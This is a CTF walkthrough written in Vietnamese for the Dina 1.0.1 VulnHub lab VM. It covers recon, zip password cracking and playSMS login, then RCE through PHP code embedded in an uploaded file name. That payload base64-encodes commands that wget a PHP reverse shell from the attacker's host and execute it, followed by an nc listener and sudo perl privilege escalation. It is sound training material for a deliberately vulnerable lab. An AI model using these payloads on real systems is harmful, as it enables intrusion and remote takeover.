DINA: 1.0.1 ~ VulnHub

1. Mô tả:

Welcome to Dina 1.0.1

________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))

This is my first Boot2Root - CTF VM. I hope you enjoy it.

if you run into any issue you can find me on Twitter: @touhidshaikh22

Contact: touhidshaikh22 at gmaill.com <- Feel Free to write mail

Website: http://www.touhidshaikh.com

Goal: /root/flag.txt

Level: Beginner (IF YOU STUCK ANYwhere PM me for HINT, But I don't think need any help).

Download: https://drive.google.com/file/d/0B1qWCgvhnTXgNUF6Rlp0c3Rlb0k/view

Try harder!: If you are confused or frustrated don't forget that enumeration is the key!

Feedback: This is my first boot2root - CTF Virtual Machine, please give me feedback on how to improve!

Tested: This VM was tested with:

Virtual Box 5.X

Networking: DHCP service: Enabled

**IP address**: Automatically assign

Fixing:

Some challenge issue reported by @eliot

Looking forward to the write-ups!

Doesn't work with VMware. Virtualbox only. v1 - 10/07/2017 v1.0.1 - 17/10/2017

2. Tải xuống

• Dina-1-0-1.ova (Size: 1.1 GB)
• Download: https://drive.google.com/file/d/0B1qWCgvhnTXgNUF6Rlp0c3Rlb0k/view
• Download (Mirror): https://download.vulnhub.com/dina/Dina-1-0-1.ova
• Download (Torrent): https://download.vulnhub.com/dina/Dina-1-0-1.ova.torrent  

3. Khai thác

Bước 1: Thu thập thông tin

Sử dụng cụ arp-scan để dò quét ip

arp-scan 192.168.44.0/24

Phát hiện được ip victim khai thác là 192.168.44.141

Sử dụng nmap để dò quét các cổng dịch vụ đang chạy

nmap -sC -sV 192.168.44.141

Thu được duy nhất cổng 80, thấy được đường dẫn robots.txt và có 5 đường dẫn không hiển thị, mình truy cập vào web để kiểm tra.

Bước 2: Khai thác dịch vụ web

Mình truy cập tới một số đường dẫn ẩn này phát hiện đường dẫn /nothing có thông tin như ảnh

 Mình kiểm tra thử mã nguồn của trang này, phát hiện ra một danh sách mật khẩu

Mình lưu lại chuỗi này để có khi cần dùng đến. Mình thử tìm kiếm thêm một số đường dẫn url khác xem có không sử dụng công cụ gobuster

gobuster dir -u http://192.168.44.141/ -w /usr/share/dirbuster/wordlists/directory-list-2.3.medium.txt -t 50 -x php,html,txt,bak,zip

Thấy một đường dẫn /secure và truy cập thấy được một tệp tin là backup.zip mình sẽ tải về

Mình bắt đầu thử giải nén, nó yêu cầu mật khẩu, ở đây mình dựa vào danh sách mật khẩu ở trên mình thu được

Mình vét cạn mật khẩu sử dụng công cụ john và danh sách mật khẩu ở trên

python zip2john.py backup.zip > hash.txt

john --wordlist=pass.txt hash.txt

Giải nén thành công thu được tệp .mp3 giả trên, mình đọc xem nội dung thấy một username là touhid và url: /SecreTSMSgatwayLogin

Mình truy cập url trên thấy đây là một trang đăng nhập

Mình thử đăng nhập với user touhid và mật khẩu trong danh sách mình thu được và tìm được một pass ****** ( bạn thử tìm nhé mình không tiết lộ đâu) 😎😎😎

Mình thử tìm các lỗ hổng có thể khai thác trên playsms 

searchexploit -m playsms

Mình thấy một lỗi là có thể send file định dạng php để thực hiện một RCE chẳng hạn, tồn tại lỗi này trong metasploit nhưng chuyện buồn là mặc dù thực thi được mã lỗi nhưng không thể điều khiên hay tương tác tới victim gì cả mình nghĩ các khác mình tìm trên web thấy một trang upload.

Mình thử tạo một tệp tin .php như sau:

touch "<?php print 'Hackertest' ?>.php"

Khi upload file lên mình thấy lệnh print được thực thi hiển thị thành một tệp tin là Hackertest.php, minh tiến hành bấm send mình thấy không báo lỗi gì vậy đã cho mình một ý tưởng tải reverse shell php lên hệ thống để nó thực thi.

Bước 3: Thực hiện kết nối tới victim và leo thang

cp /usr/share/webshell/php/php-reverse-shell.php upload/shell001.php

cd upload

echo "wget http://ipkali:8080/shell001.php -o /tmp/shell001.php" | base64

touch "<?php echo shell_exec('\$(echo d2dldCBodHRwOi*vMTkyLjE2...| base64 -d)') ?>.php"

echo "php -f /tmp/shell001.php" | base64

touch "<?php echo shell_exec('\$(echo cGhwIC1mIC90bXAvc2hlbGwwMDEucGhwCg==| base64 -d)') ?>.php"

Mình tiến hành tải từng tệp này này lên một, đồng thời trên máy kali mình mở 2 tab chạy 2 lệnh riêng biệt sau

python -m SimpleHTTPServer 8080

nc -lnvp 4444

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

sudo -l

Phát hiện nó có thể sử dụng perl một cách thoải mái mình lên trang GTFOBins để lấy mã leo thang và thục thi nó

😇😇😇😇😈😈😈😈😈💥💥💥💥💥